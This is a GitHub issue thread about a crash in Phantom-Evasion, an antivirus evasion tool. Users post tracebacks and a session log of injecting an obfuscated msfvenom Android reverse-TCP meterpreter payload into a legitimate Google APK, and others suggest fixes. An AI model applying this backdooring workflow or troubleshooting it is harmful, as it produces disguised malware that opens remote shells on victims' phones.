oddcod3 / Phantom-Evasion

Python antivirus evasion tool
GNU General Public License v3.0
[>] Obfuscating Smali code... #65

Open cypherskb opened 4 years ago

cypherskb commented 4 years ago

Traceback (most recent call last):
  File "./phantom-evasion.py", line 402, in <module>
    CompleteMenu()
  File "./phantom-evasion.py", line 190, in CompleteMenu
    Phantom_lib.ModuleLauncher(module_type)
  File "Setup/Phantom_lib.py", line 937, in ModuleLauncher
    LoadExecModule(M_type,ModOpt)
  File "Setup/Phantom_lib.py", line 591, in LoadExecModule
    ApkSmaliObfuscator_android(ModOpt)
  File "Modules/payloads/MsfvenomObfuscateBackdoor_android.py", line 287, in ApkSmaliObfuscator_android
    os.rename("msf_smali/smali/com/metasploit","msf_smali/smali/com/" + ModOpt["Metaspl"])
OSError: [Errno 2] No such file or directory

oddcod3 commented 4 years ago

Hi @cypherskb could you post more details about the options used?

ajxdadev commented 4 years ago

Having the same issue!! Options used are:
payload: android/meterpreter/reverse_tcp
No Custom MSF options selected
Inject backdoor into another apk? YES

[+] MODULE DESCRIPTION:

Msfvenom android payload obfuscator smali/baksmali msfvenom payloads with apktool
[>] Obfuscated payload can be used to backdoor apk file
[>] Outformat: apk

Press Enter to continue:

[>] Insert msfvenom payload (default: android/meterpreter/reverse_tcp):

[>] Insert LHOST: 10.64.3.247

[>] Insert LPORT: 4444

[>] Custom msfvenom options(default: empty):

[>] Inject backdoor into another apk?(default:Y/n): y

[>] Insert apk filename to backdoor: /root/Downloads/com.google.android.tag_1.1-101_minAPIR(nodpi)_apkmirror.com.apk

[>] Insert output filename:bund

[>] Generating code...

[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10181 bytes
Saved as: msf_gen.apk

[>] Baksmaling...

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Destination directory (/root/Phantom-Evasion/msf_smali) already exists. Use -f switch if you want to overwrite it.

[>] Baksmaling...

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
I: Using Apktool 2.4.1 on com.google.android.tag_1.1-101_minAPIR(nodpi)_apkmirror.com.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Renamed manifest package found! Replacing com.google.android.tag with com.android.apps.tag
I: Decoding file-resources...
I: Decoding values / XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

[>] Obfuscating Smali code...

Traceback (most recent call last):
  File "./phantom-evasion.py", line 402, in <module>
    CompleteMenu()
  File "./phantom-evasion.py", line 190, in CompleteMenu
    Phantom_lib.ModuleLauncher(module_type)
  File "Setup/Phantom_lib.py", line 937, in ModuleLauncher
    LoadExecModule(M_type,ModOpt)
  File "Setup/Phantom_lib.py", line 591, in LoadExecModule
    ApkSmaliObfuscator_android(ModOpt)
  File "Modules/payloads/MsfvenomObfuscateBackdoor_android.py", line 287, in ApkSmaliObfuscator_android
    os.rename("msf_smali/smali/com/metasploit","msf_smali/smali/com/" + ModOpt["Metaspl"])
FileNotFoundError: [Errno 2] No such file or directory: 'msf_smali/smali/com/metasploit' -> 'msf_smali/smali/com/mlttti'

vij7661 commented 4 years ago

Remove the msf_smali file from the phantom-evasion folder and rerun python3.Phantom-Evasion.py

sam14x commented 4 years ago

This is the solution that I found and that worked for me: use sudo apktool empty-framework-dir

Then delete the smali folders and previous projects' data from the phantom evasion folder, then run the setup script (#7 or 8 I guess) from phantom_evasion.py and rerun the script.

Hope this works